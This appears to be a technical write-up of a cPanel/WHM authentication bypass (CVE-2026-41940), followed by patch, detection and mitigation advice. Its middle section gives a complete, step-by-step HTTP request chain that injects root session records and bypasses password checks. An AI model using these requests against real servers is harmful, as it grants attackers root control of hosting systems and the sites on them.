Deep Dive into cPanel/WHM Auth Bypass Vulnerability (CVE‑2026‑41940)

Vulnerability Overview

cPanel & WHM is a widely deployed shared‑hosting control panel managing over 70 million domains. WHM provides root‑level server access; cPanel is the user‑side interface.

CVE‑2026‑41940 is an authentication‑bypass flaw affecting all supported versions. Patched releases are:

cPanel & WHM 110.0.x → 11.110.0.97 (was 11.110.0.96)

cPanel & WHM 118.0.x → 11.118.0.63 (was 11.118.0.61)

cPanel & WHM 126.0.x → 11.126.0.54 (was 11.126.0.53)

cPanel & WHM 132.0.x → 11.132.0.29 (was 11.132.0.27)

cPanel & WHM 134.0.x → 11.134.0.20 (was 11.134.0.19)

cPanel & WHM 136.0.x → 11.136.0.5 (was 11.136.0.4)

KnownHost has confirmed active exploitation in the wild.

Technical Details

Session File Structure

cPanel stores sessions as files:

Raw file: /var/cpanel/sessions/raw/<session_id> Cache file (JSON): /var/cpanel/sessions/cache/<session_id> Each file uses a key=value format. Example of a failed login session:

local_ip_address=172.17.0.2
external_validation_token=bOOwkwVzFsruooU0
cp_security_token=/cpsess7833455106
needs_auth=1
origin_as_string=address=172.17.0.1,app=whostmgrd,method=badpass
hulk_registered=0
tfa_verified=0
ip_address=172.17.0.1
local_port=2087
port=49254
login_theme=cpanel

The session‑ID cookie has the form :Wg_mjzgt1hyfXefK,1bd3d4bf5ecbf83b660789ab0f3198fa. The 32‑hex segment after the comma is the <ob> per‑session key used to encrypt the pass field.

Vulnerability Mechanics

The flaw combines two issues:

Issue 1: Unfiltered CRLF injection

In saveSession, if the <ob> segment is missing, the encoder is not invoked and the pass field is written in clear text:

if (defined $ob && length $ob) {
    my $encoder = Cpanel::Session::Encoder->new('secret' => $ob);
    $session_ref->{'pass'} = $encoder->encode_data($session_ref->{'pass'});
} else {
    $session_ref->{'pass'} = 'no-ob:' . Cpanel::Session::Encoder->hex_encode_only($session_ref->{'pass'});
}

The set_pass routine strips only NUL bytes, preserving a \r\n sequence injected via the HTTP Basic‑Auth header.

Issue 2: Cache‑first loading

The loadSession function prefers the JSON cache file over the raw file. Injected records in the raw file are not parsed because the cached pass value remains a single string containing the injected \r\n.

Exploitation Chain

Step 1: Create a pre‑auth session

POST /login/?login_only=1 HTTP/1.1
Host: target:2087
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

user=root&pass=wrong

The response includes a cookie, e.g.:

Set-Cookie: whostmgrsession=%3aQSJN_sFdKZtCi2o_%2c4d257abc371539dfebdf7d3a3e64de0b

Decoded value: :QSJN_sFdKZtCi2o_,4d257abc371539dfebdf7d3a3e64de0b Step 2: Inject malicious records

x

hasroot=1

tfa_verified=1

user=root

cp_security_token=/cpsess9999999999

successful_internal_auth_with_timestamp=1777462149

Base64‑encode the header and send the request. The cookie retains only the name part (the ,<obhex> is stripped), while the injected lines are written into the raw session file:

GET / HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=%3aQSJN_sFdKZtCi2o_
Authorization: Basic <base64(root:payload)>

Resulting raw session file:

pass=x
hasroot=1   <-- injected
tfa_verified=1   <-- injected
user=root   <-- injected
cp_security_token=/cpsess9999999999   <-- injected
successful_internal_auth_with_timestamp=1777462149   <-- injected

Step 3: Promote injection to the cache

Trigger Cpanel::Session::Modify->new + save with nocache=>1 to force reading the raw file and updating the JSON cache. Example request:

GET /scripts2/listaccts HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=%3aQSJN_sFdKZtCi2o_

The response is “401 Token Denied”, but the cache JSON now contains the injected keys:

{
  "tfa_verified":"1",
  "user":"root",
  "hasroot":"1",
  "successful_internal_auth_with_timestamp":"1777462149",
  ...
}

Step 4: Bypass password verification

The function docheckpass_whostmgrd checks for the successful_internal_auth_with_timestamp field; if present, it returns AUTH_OK without consulting /etc/shadow:

sub check_authok_user {
    if ($AUTHOPTS{'authable_user'}{'successful_internal_auth_with_timestamp'}) {
        return $Cpanel::Server::AUTH_OK, 0;  # no /etc/shadow lookup
    }
}

Step 5: Verify privileged access

GET /json-api/version HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=%3aQSJN_sFdKZtCi2o_

The server returns “200 OK” instead of “403 Forbidden”, confirming a root‑level session.

Impact Assessment

Scope

All supported cPanel & WHM versions (see patched list)

Approximately 70 million+ domains worldwide

Attacker gains full root privileges on the host

Active exploitation confirmed by KnownHost

Attack Prerequisites

Target runs a vulnerable cPanel/WHM version

Attacker can send HTTP requests to ports 2087/2086

No valid credentials are required

Severity

CVSS score pending official rating (estimated >9.0)

Exploit complexity: low (only crafted HTTP request)

Attack vector: network

Privilege escalation: full root

Mitigation and Defense

Immediate Patch

Upgrade to the patched versions listed in the overview.

Back up all data and configuration.

Validate the upgrade process in a test environment.

Schedule the upgrade during a maintenance window.

Temporary Workarounds

Restrict access to ports 2087/2086 to trusted IPs.

Enable firewall rules to block abnormal Basic‑Auth requests.

Deploy WAF signatures that detect the CRLF injection pattern.

Monitor /var/cpanel/sessions/raw/ and /var/cpanel/sessions/cache/ for unexpected modifications.

Watch for the appearance of the successful_internal_auth_with_timestamp field in session files.

Use the Detection Artifact Generator released by watchTowr Labs (GitHub repository URL provided below).

Verify Patch Status

Check the installed version: /usr/local/cpanel/cpanel -V Confirm session file permissions: ls -la /var/cpanel/sessions/ Audit logs for suspicious authentication entries: grep -i "auth" /var/log/secure or

/var/log/messages

Timeline

2026‑03‑27 – Vulnerability first disclosed.

2026‑03‑31 – Patch versions released (4 days later).

2026‑04 onward – KnownHost observes wild exploitation.

2026‑05‑01 – watchTowr Labs publishes full technical analysis.

References

cPanel official security advisory: https://support.cpanel.net/hc/en-us/articles/40073787579671-Critical-Vulnerability-with-cPanel-WHM-Login-Authentication

watchTowr Labs technical report: https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/

Detection tool GitHub repository: https://github.com/watchTowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

KnownHost exploitation confirmation (Reddit): https://www.reddit.com/r/cpanel/comments/1syyajp/comment/oiyg0fr/